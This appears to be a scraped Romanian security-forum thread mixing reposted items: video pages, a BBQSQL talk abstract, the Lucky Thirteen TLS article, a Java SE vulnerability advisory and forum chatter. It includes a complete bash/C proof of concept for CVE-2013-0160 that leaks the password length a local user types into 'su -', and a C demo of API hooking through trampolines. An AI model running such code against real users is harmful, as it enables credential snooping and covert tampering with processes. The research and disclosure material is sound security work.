[TD]users_delighted_better_UX_using_CSS_3_in_particular_and_HTML5_in_general.mp4[/TD] [TD=align: right]03-Feb-2013 14:37 [/TD] [TD=align: right] 94M[/TD] [TD] [/TD] [/TR] [TR] [TH=colspan: 5] [/TH][/TR] [/TABLE] Sursa: Index of /linux.conf.au/2013/mp4

Chinese experts slam U.S. hacking accusations - People's Daily Online US military advisor calls for McKinnon pardon, recruitment of "master hackers" • The Register https://www.computerworld.com/s/article/9236535/President_can_order_preemptive_cyberattacks_if_needed 'Chinese still hacking us,' says Wall Street Journal owner | Security & Privacy - CNET News

Da, ai dreptate, munca pe bani putini. Dar sa nu uitam ca open-source nu inseamna lipsa unei finantari. Companiile mari care fac practic bani de pe urma proiectelor open-source platesc oameni sa lucreze la aceste proiecte. Un exemplu ar fi Intel si un exemplu de proiect e chiar kernelul de Linux. Daca procesoarele lor nu ar functiona pe Linux ar fi nasol, deci investesc in programatori de kernel. Cam asa e si cu alte proiecte, se mai adauga donatii in unele cazuri sau sponsorizari, cum e cazul OpenSSL care asteapta sponsorizari de 50K dolari. Dar daca suntem atenti, ne dam seama ca ofera suport FIPS, certificare care costa cam 50K dolari. Ce poate fi util pentru acesti tineri pe langa faptul ca invata multe lucruri noi si utile e faptul ca ajung sa lucreze la companii mari gen Google care ii vor trata bine.

Uuu, shit just got serious... Avem cele doua tabere: 1. Chinezii cu vorba aia: Cum sparg chinezii o parola? Incearca fiecare cate una. Adica sunt multi -> potential 2. Americanii care sunt baieti cu bani si pot plati niste indieni cu 2 dolari pe an sa le faca treburile murdare Pe cine pariati?

De pe Jurnalul, aceeasi stire: "Cei 334 de elevi participanti din 36 de ??ri au trebuit sa rezolve 1925 de diferite teme si sarcini propuse de organizatiile open source" "Cei 20 au rezolvat 576 de teme anun?? Google Open Source" Aparent el a lucrat la BRL-CAD | Open Source Solid Modeling . Sunt curios daca aceste initiative sunt ok, sau companiile doar pun niste copii sa le faca treaba Se pare ca alte proiecte pe acolo au mai fost Fedora, NetBSD, KDE si Haiku. Interesant.

Vine HTML 5 si nu mai e nevoie nici de Java nici de Flash.

Da, frumos articol

[h=1]Stephan T. Lavavej - Core C++, 8 of n[/h] [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 63.4 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 374.7 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 444.2 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 821.3 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 573.1 MB High Quality WMV (PC, Xbox, MCE) In part 8, STL digs into the do-while loop, casts, one definition rule (ODR), and his variadic template array sorter. There is a lot of information in this episode, so get comfortable, tune in, and learn. See part 1: Name Lookup See part 2: Template Argument Deduction See part 3: Overload Resolution See part 4: Virtual Functions See part 5: Explicit and Partial Specialization See part 6: New C++11 features added to the Visual C++ 2012 compiler (CTP) See part 7: Usual Arithmetic Conversions and Template Metaprogramming Sursa: Stephan T. Lavavej - Core C++, 8 of n | C9 Lectures: Stephan T. Lavavej - Core C++ | Channel 9

Rapid Blind Sql Injection Exploitation With Bbqsql Description: Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. This talk will be introducing a new tool called BBQSQL that attempts to address these concerns. This talk will start with a brief discussion of SQL Injection and Blind SQL Injection. It will then segue into a discussion of how BBQSQL can be useful in exploiting these vulnerabilities. This talk will cover how features like evented concurrency and character frequency based searching can greatly improve the performance of a SQL Injection tool. This talk should leave you with enough knowledge to begin using BBQSQL to simplify and speed up your application pentests. Ben Toews is a Security Consultant at Neohapsis where he specializes in application and network pentesting. Previously, Ben has worked as a sysadmin and as a developer. Ben has spoken at Thotcon 0x03 and has been published in HITB Magazine. Ben has a BS in Information Assurance and Security Engineering from DePaul University. Twitter: @mastahyeti Ben Toews (mastahyeti) Scott Behrens is currently employed as a Security Consultant at Neohapsis and an Adjunct Professor at DePaul University. Before Neohapsis, Scott Behrens was an Open Systems Architect for a financial consulting firm, as well as a Network Administrator at Argonne National Laboratories. Scott Behrens' expertise lies in software security assessment, network penetration testing, social engineering, security architecture, and security research. Scott is also the co-developer of NeoPI, a framework to aid in the detection of obfuscated malware. Scott has also presented at Chicago B-sides and has published numerous articles in various security outlets. Scott Behrens has an MS in Network Security from DePaul University. Twitter: @HelloArbit Scott Behrens (Arbit) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Rapid Blind Sql Injection Exploitation With Bbqsql

[h=1]Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure[/h] #!/bin/bash # ptmx-su-pwdlen.sh -- This PoC determine the password length of a local # user who runs "su -". Done thanks to the ptmx keystroke timing attack # (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for # more information. # # Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64). # # "THE BEER-WARE LICENSE" (Revision 42): # <vladz@devzero.fr> wrote this file. As long as you retain this notice # you can do whatever you want with this stuff. If we meet some day, and # you think this stuff is worth it, you can buy me a beer in return. -V. if ps -e -o cmd= | egrep -q "^(-|^)su"; then echo "[-] Kill/close all running \"su\" session before using this PoC" exit 1 fi exe=$(mktemp) || exit 1 tmp=$(mktemp) || exit 1 cat > ${exe}.c << _EOF_ #include <stdio.h> #include <signal.h> #include <unistd.h> #include <sys/inotify.h> static int count = 0; void display_result() { printf("[+] password len is %d\n", count-1); _exit(0); } int main() { int fd; char buf[1024]; signal(SIGINT, display_result); fd = inotify_init(); inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY); while(read(fd, buf, 1024)) count++; return 0; } _EOF_ cc -o ${exe}{,.c} echo " [*] Wait for someone to run \"su -\"" while true; do ps -e -o cmd= | egrep "^(-|^)su" >${tmp} x=$(wc -l ${tmp}) case ${x% *} in 1) (( run )) && continue; echo -n "[+] su detected, full command: " cat ${tmp}; ${exe} & (( run = 1 )) ;; 2) [ ! -z "$!" ] && kill -2 $!; break ;; esac done rm -f ${exe}{,.c} ${tmp} Sursa: Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure

Captureaza un request si arata-mi exact cum il trimite browser-ul tau. Asta ca sa nu stau eu cu tcpdump ca mor.

http://i49.tinypic.com/2rz75n6.png

Cred ca glumesti... Acolo nu sunt puse cu [ IMG ] , sunt doar niste link-uri. Imgur: Imageshack: Nu iti apar?

No pula, acum sunt multe de China, Indonezia, Brazilia si alte tari de care nu am auzit Cati vizitatori avem: There are currently 1517 users online. 81 members and 1436 guests Asta e tot ce pot fetele? netstat -ntp | sort -u | grep FIN_WAIT1 | grep -E -o '443.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})' | grep -E -o '([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})' | sort -u

Detalii: https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf

E posibil ca unele servere sa verifice HTTP_REFERER si daca vad ca se face request de pe alt server sa dea cod de eroare. Pune niste exemple.

Defrag Tools: #26 - WinDbg - Semaphores, Mutexes and Timers By: Larry Larsen, Andrew Richards, Chad Beeder How do I download the videos? To download, right click the file type you would like and pick “Save target as…” or “Save link as…” Why should I download videos from Channel9? It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! Which version should I choose? If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) File size 46.7 MB MP4 (iPod, Zune HD) File size 281.5 MB Mid Quality WMV (Lo-band, Mobile) File size 167.7 MB High Quality MP4 (iPad, PC) File size 619.7 MB Mid Quality MP4 (WP7, HTML5) File size 432.3 MB High Quality WMV (PC, Xbox, MCE) In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to diagnose Semaphores, Mutexes and (Waitable) Timers in a user mode application. For timers, we delve deep in to the kernel to gather more information about them. We use these commands: !handle !handle <handle> <mask> !object <name> !object <addr> !timer !timer <addr> ub @rip dt nt!_KTHREAD <addr> Make sure you watch Defrag Tools Episode #1 and Defrag Tools Episode #23 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbol and source code resolution. Resources: Synchronization Functions Semaphore Objects Mutex Objects Waitable Timer Objects Sysinternals LiveKD Sysinternals WinObj Windows 7 and Windows Server 2008 R2 Kernel Changes (Timer Coalescing) Timeline: [02:47] - Demo Apps [SkyDrive] [03:08] - Semaphores [09:32] - Mutexes [15:32] - Waitable Timers [15:58] - Clock Resolution [17:05] - Timer Coalescing [19:45] - Timer demo application [25:05] - LiveKD makes a kernel dump [26:37] - Object Manager - !object [29:40] - DPC Timers - !timer [35:22] - !timer <addr> [35:52] - Waiting Threads - !thread <addr> 17 [37:08] - Wait Start TickCount [38:55] - Kernel Wait Routines [41:12] - Dump Type of Kernel Thread - dt nt!_KTHREAD <addr> [42:00] - Running, Ready and Waiting states [44:54] - Wakable Timers [47:22] - powercfg.exe /waketimers [49:18] - 'Century' DPC Timer Routine [50:43] - Post in the forums and email us at defragtools@microsoft.com! Sursa: Defrag Tools: #26 - WinDbg - Semaphores, Mutexes and Timers | Defrag Tools | Channel 9

[h=1]How to: iOS 6.x Untethered Jailbreak on Linux[/h] The following tutorial will teach Linux users how to jailbreak their Apple iPhone 3GS, iPhone 4/4S, iPad 2/3/4 and iPod Touch 4G/5G devices that run iOS 6 or later. In this tutorial we will use the recently released evasi0n jailbreak tool, which runs on Linux, Mac OS X and Windows platforms. In no more than five minutes, your iDevice will be jailbreaked, only if you read the following information and warnings carefully. Supported devices: · iPhone 3GS; · iPhone 4 GSM; · iPhone 4S; · iPod Touch 4G; · iPod Touch 5G; · iPad 2 Wi-Fi; · iPad 2 3G; · iPad 2 2012; · iPad 3 Wi-Fi · iPad 3 Wi-Fi + 4G; · iPad 4 Wi-Fi; · iPad 4 Wi-Fi + 4G; · iPad Mini Wi-Fi; · iPad Mini 3G. Requirements: · evasi0n 1.0; · A device from the above list with iOS 6.0, 6.0.1 or 6.1; · A Linux distribution with a recent version of libimobiledevice library, kernel >= 2.6.24, and libgtk+-2.0 >= 2.24.13. WARNING:Make sure that your iPad, iPhone or iPod device is supported (see the supported devices list at the beginning of the article) and that is was already updated to iOS 6.x. Those of you who require a network unlock DO NOT PROCEED with the tutorial! ATTENTION: ALWAYS make a backup of your device(s) before the jailbreak procedure! Make sure the battery is charged over 50% and that the device is connected to the computer via the USB cable! Not meeting these requirements will result in a failure! Step 1 – Download and execute evasi0n You can grab a copy of the evasi0n jailbreak tool right now from here. Download it on your desktop and extract the file from the archive. Both 32-bit and 64-bit architectures are supported. Connect your iDevice and double-click the executable for your architecture and you will see the following window... [TABLE=align: center] [TR] [TD][/TD] [/TR] [/TABLE] Your device will be detected, and all you have to do now is to click the "Jailbreak" button. DO NOT PUSH ANY BUTTONS! DO NOT TOUCH THE COMPUTER! DO NOT REMOVE ANY CABLE! When the progress bar on the evasi0n tool is complete, and the evasi0n icon appears on your device, launch it to complete the jailbreak process! When evasi0n finished the jailbreak process, reboot the device and you'll see the Cydia icon on the home screen of your iDevice, which means that the jailbreak process is over and you can restore the backup. Watch the video below for more details! Sursa: How to: iOS 6.x Untethered Jailbreak on Linux - Softpedia

[h=1]JavaScript becoming default language for GNOME apps[/h] At the GNOME Developer Experience Hackfest in Brussels, the GNOME developer community has tackled the problem of specifying a canonical development language for writing applications for the GNOME desktop. According to a blog post by Collabora engineer and GNOME developer Travis Reitter, members of the GNOME team are often asked what tools should be used when writing an application for the desktop environment and, up until now, there has been no definitive answer. The team has now apparently decided to standardise on JavaScript for user-facing applications while still recommending C as the language to write system libraries in. The Hackfest took place in the days immediately preceding the FOSDEM 2013 conference in Brussels and was well attended by representatives from many different open source companies. There was a "broad consensus" to adopt a single language for GNOME application development, says Reitter. He points out that a canonical language enables the developers to more easily prepare documentation for, and share knowledge with, newcomers to the development community. It also helps more easily integrate applications written for the desktop with the desktop's infrastructure. After a long discussion weighing the arguments for and against several languages, the developers apparently decided on JavaScript, as it is already well supported in GNOME 3 by virtue of the fact that the desktop's GNOME Shell interface uses it to implement its user interface. Reitter also points to ongoing work to make JavaScript better supported as a first class desktop development language. GNOME's JavaScript plans are informed in part by how the language is used for similar purposes in Windows 8, Firefox OS and other systems, and that, the team hopes, will make it easier for developers who are new to GNOME to work with it. Despite the fact that JavaScript will be the recommended way to write GNOME applications, the developers are nonetheless stressing that other languages will still be supported. "It's critical that everyone understands this decision as a plan to elevate the language, bindings, tools, and documentation to a level of quality we have not yet achieved. It is not a decision to abandon any other language bindings", says Reitter. (fab) Sursa: JavaScript becoming default language for GNOME apps - The H Open: News and Features

ApiHooks 6 ApiHooks 6 is a set of libraries and tools for advanced process modification and noninvasive debugging on Microsoft® Windows® NT 3.51, 4.0, 2000, XP, 2003, Vista, 2008, 7 x86 and x64. AH6 is not compatible with AH5. It can hook even autochk at boot time or a process before its full initialization (= before DllMains of statically linked modules are first time executed). Works under any account and doesn't modify files. There's still no need for services or kernel drivers. ApiHooks 6 is free. Current version : 6.8 Previous version : 6.6 Previous version : 6.51 Previous version : 6.5 Previous version : 6.4 Previous version : 6.3 Sursa: ApiHooks 6 - ApiHooks.com

[h=1][c] API hooking demo[/h]Author: [h=3]nofrillz[/h] As part of my honours project I need to hook API's in different programs, so I've written a suite of functions which make it easy to hook. The body of the code is fairly messy, so I won't post it until I've tidied it up, but here's the main function I use to make this dynamic: // structure for trampolines typedef void* (*HOOKED)(void); typedef struct _TRAMPOLINE { BYTE callstuff[6]; // this will be set constantly int num; HOOKED hooked; struct _TRAMPOLINE* next; } TRAMPOLINE, *PTRAMPOLINE; DWORD SetupTrampoline(DWORD* tramp){ int i=0; // find trampoline we want PTRAMPOLINE trampaddr = tramplist; PTRAMPOLINE lasttramp = tramplist; if(!tramplist){ trampaddr = (PTRAMPOLINE) calloc(1, sizeof(TRAMPOLINE)); tramplist = trampaddr; } else{ while(trampaddr){ i++; lasttramp = trampaddr; trampaddr = trampaddr->next; } trampaddr = (PTRAMPOLINE) calloc(1, sizeof(TRAMPOLINE)); lasttramp->next = trampaddr; } // make trampoline executable DWORD oldperms; VirtualProtect(LPVOID ( ((DWORD) trampaddr) & 0xFFFFF000 ), 0x1000, PAGE_EXECUTE_READWRITE, &oldperms); // update the trampoline struct trampaddr->callstuff[0] = 0xE8; // call trampaddr->callstuff[5] = 0xC3; //ret DWORD funcaddress = ((DWORD) &MessageBoxWrapper) - ((DWORD) &trampaddr->callstuff) - 5; *((DWORD*) &trampaddr->callstuff[1]) = funcaddress; trampaddr->hooked = (HOOKED) *tramp; trampaddr->num = i; //hooked = (HOOKED) *tramp; return (DWORD) trampaddr; } void* MessageBoxWrapper(void){ _asm{ pop eax sub eax,5 mov curtramp, eax } // get trampoline sprintf(mbnum, "Hook number #%d", curtramp->num); MessageBox(0, mbnum, "dynamic hooking", 0); if(curtramp->hooked) return (curtramp->hooked)(); else return NULL; } The key to this is the TRAMPOLINE struct. The 6-byte array at the start holds a CALL to the MessageBoxWrapper function (named as this originally just hooked the MessageBoxW function) and a RET afterwards, which isn't strictly necessary as we negate the call later on. The SetupTrampoline function saves a copy of the function we're hooking as a type HOOKED (a pointer that we can call), and returns a pointer to the TRAMPOLINE struct (which when called, will call the MessageBoxWrapper function). Once the TRAMPOLINE struct is set up, the function overwriting the import table (will be covered when I tidy up my other code) will store the pointer to it, and then when the infected process calls that API, it ends up calling the TRAMPOLINE struct instead, which then calls MessageBoxWrapper. The CALL opcode pushes the address of the next piece of code onto the stack and does a jump, so we push that off, subtract 5 from it (1 byte for CALL and 4 bytes for the address), and this gives us the pointer to the TRAMPOLINE struct. Because it's a data structure, we can extract any details that we added in earlier (so there's room for expansion here), but all we really need to do is jump to the address in the hooked parameter and we're done. I'm using vs05 for this, and it might not build the same for everyone, but doing return hooked() actually compiles to a JMP, which means the stack is untouched, and once it gets to the original function the stack is clear and any trace of us having messed with things is gone. Sursa: [c] API hooking demo - rohitab.com - Forums

Unlucky for you: UK crypto-duo 'crack' HTTPS in Lucky 13 attack OpenSSL patch to protect against TLS decryption boffinry By John Leyden • Get more from this author Posted in Security, 4th February 2013 16:58 GMT Two scientists say they have identified a new weakness in TLS, the encryption system used to safeguard online shopping, banking and privacy. The design flaw, revealed today, could be exploited to snoop on passwords and other sensitive information sent by users to HTTPS websites. Professor Kenny Paterson from the Information Security Group at Royal Holloway, University of London and PhD student Nadhem Alfardan claim they can crack TLS-encrypted traffic in a man-in-the-middle attack. According to their study, the weakness revolves around altering messages exchanged between the web server and browser, and noting microsecond differences in the time taken to process them. These timings effectively leak information about the data being transferred, allowing eavesdroppers to rebuild the original unencrypted information slowly piece by piece. Specifically, an attacker strategically changes the data used to pad out the encrypted blocks of information, and measures the time taken for the server to work out that the message was tampered with before rejecting it. The progress of the algorithms processing the blocks is revealed by this time difference, and it's enough to gradually calculate the contents of the original message. But it is tricky to precisely measure these timings due to network jitter and other effects. And tampering with the data will cause the connection between the browser and the server to fail. Thus, a bit of client-side malware is needed to repeatedly probe a server with new connections, replaying slightly altered versions of the original encrypted message, which might for example be a login cookie. This is similar to the earlier BEAST (Browser Exploit Against SSL/TLS) attack. We're told attacks against DTLS - a variant of TLS used by VPNs to secure traffic - can be carried out in a single session. Speaking to El Reg, Prof Paterson said JavaScript code injected into a web page could implement the new research and decrypt a victim's login cookie in about two hours: "An ordinary cyber-criminal would just use a phishing attack [to get a password] but for a nation state interested in getting an activist's login cookie for Tor, this sort of attack is possible for a determined and well-resourced attacker. "TLS is not quite as bullet-proof as we thought." A paper [PDF] titled Lucky Thirteen: Breaking the TLS and DTLS Record Protocols was published on Monday, and states: The Transport Layer Security (TLS) protocol aims to provide confidentiality and integrity of data in transit across untrusted networks like the Internet. It is widely used to secure web traffic and e-commerce transactions on the Internet. Datagram TLS (DTLS) is a variant of TLS that is growing in importance. We have found new attacks against TLS and DTLS that allow a Man-in-the-Middle attacker to recover plaintext from a TLS/DTLS connection when CBC-mode encryption is used. The attacks arise from a flaw in the TLS specification rather than as a bug in specific implementations. We have carried out experiments to demonstrate the feasibility of the attacks against the OpenSSL and GnuTLS implementations of TLS, and we have studied the source code of other implementations to determine whether they are likely to be vulnerable. Professor Paterson said: "While these attacks do not pose a significant threat to ordinary users in its current form, attacks only get better with time. Given TLS's extremely widespread use, it is crucial to tackle this issue now. "Luckily we have discovered a number of countermeasures that can be used. We have been working with a number of companies and organisations, including OpenSSL, Google and Oracle, to test their systems against attack and put the appropriate defences in place." The attacks apply to all TLS and DTLS implementations that are compliant with TLS 1.1 or 1.2, or with DTLS 1.0 or 1.2. All TLS and DTLS cipher-suites that include CBC-mode encryption are potentially vulnerable. Like CRIME (Compression Ratio Info-leak Made Easy) and the earlier BEAST SSL exploit, both developed by security researchers Juliano Rizzo and Thai Duong, the Royal Holloway academics' Lucky Thirteen study threatens a fundamental e-commerce security protocol. The latest attacks "are quite different from BEAST and CRIME" as the university pair explain in an FAQ: BEAST exploits the inadvisable use of chained IVs in CBC-mode in SSL and TLS 1.0. CRIME cleverly exploits the use of compression in TLS. Our attacks are based on analysing how decryption processing is carried out in TLS. However, our attacks can be enhanced by combining them with BEAST-style techniques. The computer-science duo tested their attack against OpenSSL and GnuTLS. For OpenSSL, full plaintext recovery of encrypted data is possible. For GnuTLS, partial recovery is possible. The researchers have not studied any closed-source implementations of TLS. Blocking the attack can be achieved by either adding random time delays to CBC-mode decryption or switching to either the RC4 or AES-GCM cipher-suites. GnuTLS released a patch on Monday. OpenSSL is working on a fix. Other vendors, including web browser developers, may also need to adapt their software in response to the threat. ® Bootnote The researchers have a neat explanation for why the attack they have developed is called Lucky Thirteen: "In Western culture, 13 is considered an unlucky number. However, for our attack, the fact that the TLS MAC calculation includes 13 bytes of header information (5 bytes of TLS header plus 8 bytes of TLS sequence number) is, in part, what makes the attacks possible. So, in the context of our attacks, 13 is lucky - from the attacker's perspective at least. This is what passes for humour amongst cryptographers." Sursa: Unlucky for you: UK crypto-duo 'crack' HTTPS in Lucky 13 attack • The Register PDF: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf

Java SE CPU Feb 2013 Updates Explained Authored by Adam Gowdiak | Site security-explorations.com These are the technical details surrounding security issues reported by Security Explorations to Oracle and addressed in the Feb 2013 SE CPU update. Hello All, Below, we are providing you with technical details regarding security issues reported by us to Oracle and addressed by the company in a recent Feb 2013 Java SE CPU [1]. [Issue 29] This issue allows for the creation of arbitrary Proxy objects for interfaces defined in restricted packages. Proxy objects defined in a NULL class loader namespaces are of a particular interest here. Such objects can be used to manipulate instances of certain restricted classes. In our Proof of Concept code we create such a proxy object for the com.sun.xml.internal.bind.v2.model.nav.Navigator interface. In order to use the aforementioned proxy object, we need an instance of that interface too. We obtain it with the help of Issue 28, which allows to access arbitrary field objects from restricted classes and interfaces. As a result, by combining Issue 27-29, one can use Navigator interface and make use of its sensitive Reflection API functionality such as obtaining access to methods of arbitrary classes. That condition can be further leveraged to obtain a complete JVM security bypass. Please, note that our Proof of Concept code for Issues 27-29 was reported to Oracle in Apr 2012 and depending Issues 27-28 were addressed by the company sooner than Issue 29. Testing of the PoC will thus give best results on older versions of Java SE 7. [Issue 50] Issue 50 allows to violate a fundamental security constraint of Java VM, which is type safety. This vulnerability is another instance of the problem related to the unsafe deserialization implemented by com.sun.corba.se.impl.io.ObjectStreamClass class. Its first instance was fixed by Oracle in Oct 2011 [2] and it stemmed from the fact that during deserialization insufficient type checks were done with respect to object references that were written to target object instance created by the means of deserialization. Such a reference writing was accomplished with the use of a native functionality of sun.corba.Bridge class. The problem that we found back in Sep 2012 was very similar to the first one. It was located in the same code (class) and was also exploiting direct writing of object references to memory with the use of putObject method. While the first type confusion issue allowed to write object references of incompatible types to correct field offsets, Issue 50 relied on the possibility to write object references of incompatible types to...invalid field offsets. It might be also worth to mention that Issue 50 was found to be present in Java SE Embedded [3]. That is Java version that is based on desktop Java SE and is used in today’s most powerful embedded systems such as aircraft and medical systems [4]. We verified that Oracle Java SE Embedded ver. 7 Update 6 from 10 Aug 2012 for ARM / Linux contained vulnerable implementation of ObjectStreamClass class. Unfortunately, we don't know any details regarding the impact of Issue 50 in the embedded space (which embedded systems are vulnerable to it, whether any feasible attack vectors exist, etc.). So, it's up to Oracle to clarify any potential concerns in that area. [Issue 52] Issue 52 relies on the possibility to call no-argument methods on arbitrary objects or classes. The vulnerability has its origin in com.sun.jmx.mbeanserver.Introspector class which is located in the same package as the infamous MBeanInstantiator bug found in the wild in early Jan 2013. The flaw stems from insecure call to invoke method of java.lang.reflect.Method class: if (method != null) return method.invoke(obj, new Object[0]); In our Proof of Concept code we exploit the above implementation by making a call to getDeclaredMethods method of java.lang.Class class to gain access to methods of restricted classes. This is accomplished with the use of the following code sequence: Introspector.elementFromComplex((Object)clazz,"declaredMethods") Access to public method objects of arbitrary restricted classes is sufficient to achieve a complete Java VM security sandbox compromise. We make use of DefiningClassLoader exploit vector for that purpose. [Issue 53] Issue 53 stems from the fact that Oracle's implementation of new security levels introduced by the company in Java SE 7 Update 10 did not take into account the fact that Applets can be instantiated with the use of serialization. Such a possibility is indicated both in HTML 4 Specification [5] as well as in Oracle's code. HTML 4 Specification contains the following description for the "object" attribute of APPLET element: object = cdata [CS] This attribute names a resource containing a serialized representation of an applet's state. It is interpreted relative to the applet's codebase. The serialized data contains the applet's class name but not the implementation. The class name is used to retrieve the implementation from a class file or archive. Additionally, Java 7 Update 10 (and 11) reveal the following code logic when it comes to the implementation of new security features (Java Control Panel security levels). [excerpt from sun.plugin2.applet.Plugin2Manager class] String object_attr = getSerializedObject(); String code_attr = getCode(); ... if(code_attr != null) { Class class1 = plugin2classloader.loadCode(code_attr); ... if(class1 != null) if (fireAppletSSVValidation()) ... } else { if(!isSecureVM) return; adapter.instantiateSerialApplet(plugin2classloader,object_attr); ... } The above clearly shows that the conditional block implementing Applet instantiation via deserialization does not contain a call to fireAppletSSVValidation method. This method conducts important security checks corresponding to security levels configured by Java Control Panel. The lack of a call to security checking method is equivalent to "no protection at all" as it allows for a silent Java exploit in particular. What's worth mentioning is that for Google Chrome the following HTML sequence needed to be used to activate target Applet code: <object type="application/x-java-applet" object="BlackBox.ser"> --- We have made our original reports sent to Oracle and describing Issues 29, 50, 52 and 53 available for download from our project details page: http://www.security-explorations.com/en/SE-2012-01-details.html Along with those reports we have also published the results of our quick Vulnerability Fix Experiment regarding Issue 50. We've never heard a word from Oracle regarding it. Company's fix for Issue 50 is not a mirror of the one we had proposed, but it does rely on Class object instances for hashtable access / caching of translated ObjectStreamClass fields. At the end, we would like to question Oracle's evaluation of the impact of Java vulnerabilities fixed by the Feb 2013 Java SE CPU. Oracle emphasized that patched vulnerabilities affect primarily Java Plugin / desktop environments and that only 3 of them apply to client and server deployments of Java. The 3 vulnerabilities Oracle refers to are specifically the following ones: CVE-2013-0437 Subcomponent 2D CVE-2013-1478 Subcomponent 2D CVE-2013-1480 Subcomponent AWT None of the vulnerabilities above seem to refer to the components where our discoveries were made (i.e. CORBA, JMX / BEANS). The tests we have conducted yesterday against the latest version of Oracle GlassFish Server 3.1.2.2 (with security manager enabled) and RMI Registry from JDK 7 Update 11 confirmed the possibility to launch an attack against remote RMI server with the use of a Java SE vulnerability. We tested Issues patched by the recent CPU such as the MBeanInstantiator bug, Issue 50 and 52 and were able to: 1) remotely load custom classes into the target Java RMI server (over RMI protocol), 2) completely break Java security sandbox with the use of a Java SE vulnerability (the one which "can be exploited only through untrusted Java Web Start applications / untrusted Java applets" according to Oracle's CPU). Although Oracle is aware [6] that Java SE vulnerabilities can be also exploited "in servers, by supplying malicious input to APIs in the vulnerable server component", the company rather undermines such a possibility by delivering a message that a majority of the vulnerabilities affect Java Plugin in the web browser or that in some cases, the exploitation scenario of Java SE bugs on servers is very improbable. In general, relying on a vulnerable Java SE version makes all of the products depending on it potentially vulnerable unless there is absolutely *no way* that a vulnerable component can be reached by an attacker. As long as an attack vector through RMI protocol is valid, a potential for remote exploitation of security issues in Java SE on servers should be always concerned. Thank You. Best Regards, Adam Gowdiak --------------------------------------------- Security Explorations http://www.security-explorations.com "We bring security research to the new level" --------------------------------------------- References: [1] Oracle Java SE Critical Patch Update Advisory - February 2013 http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html [2] Oracle Java IIOP Deserialization Type Confusion Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-306/ [3] Oracle Java SE Embedded http://www.oracle.com/us/technologies/java/embedded/standard-edition/overview/index.html [4] Oracle making embedded Java push http://www.infoworld.com/d/application-development/oracle-making-embedded-java-push-203168 [5] HTML 4 Specification, Including an applet: the APPLET element http://www.w3.org/TR/html401/struct/objects.html#h-13.4 [6] February 2013 Critical Patch Update for Java SE Released https://blogs.oracle.com/security/entry/february_2013_critical_patch_update Sursa: Java SE CPU Feb 2013 Updates Explained ? Packet Storm